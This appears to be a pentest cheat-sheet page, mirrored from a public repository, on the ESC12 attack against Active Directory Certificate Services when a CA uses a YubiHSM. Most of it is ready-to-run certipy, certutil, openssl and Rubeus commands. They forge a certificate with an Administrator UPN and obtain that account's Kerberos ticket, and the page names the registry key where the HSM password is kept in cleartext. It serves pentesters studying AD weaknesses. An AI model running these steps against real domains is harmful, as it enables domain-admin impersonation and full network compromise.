ad-adcs-esc12.md (2590B)
1 --- 2 title: "Active Directory - Certificate ESC12" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc12.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc12.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC12 12 13 ## ESC12 - ADCS CA on YubiHSM 14 15 > The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its private key on a YubiHSM2 device, which requires an authentication key (password) to access. This password is stored in the registry in cleartext, allowing an attacker with shell access to the CA server to recover the private key. 16 17 **Requirements**: 18 19 * CA certificate 20 * Shell access on the root CA server 21 22 **Exploitation**: 23 24 * Generate a certicate for the user 25 26 ```ps1 27 certipy req -target dc-esc.esc.local -dc-ip 10.10.10.10 -u "user_esc12@esc.local" -p 'P@ssw0rd' -template User -ca <CA-Common-Name> 28 certipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt 29 certipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key 30 ``` 31 32 * Importing the CA certificate into the user store 33 34 ```ps1 35 certutil -addstore -user my .\Root-CA-5.cer 36 ``` 37 38 * Associated with the private key in the YubiHSM2 device 39 40 ```ps1 41 certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA-Common-Name> 42 ``` 43 44 * Sign `user_esc12.crt` and specify a `Subject Alternative Name` using the `extension.inf` file. 45 46 ```ps1 47 certutil -sign ./user_esc12.crt new.crt @extension.inf 48 ``` 49 50 * Content of extension.inf 51 52 ```cs 53 [Extensions] 54 2.5.29.17 = "{text}" 55 _continue_ = "UPN=Administrator@esc.local&" 56 ``` 57 58 * Use the certificate to get the TGT of the Administrator 59 60 ```ps1 61 openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx 62 Rubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap 63 ``` 64 65 Unlocking the YubiHSM with the plaintext password in the registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`. 66 67 ## References 68 69 * [ESC12 – Shell access to ADCS CA with YubiHSM - hajo - October 2023](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm) 70 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/) 71 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14)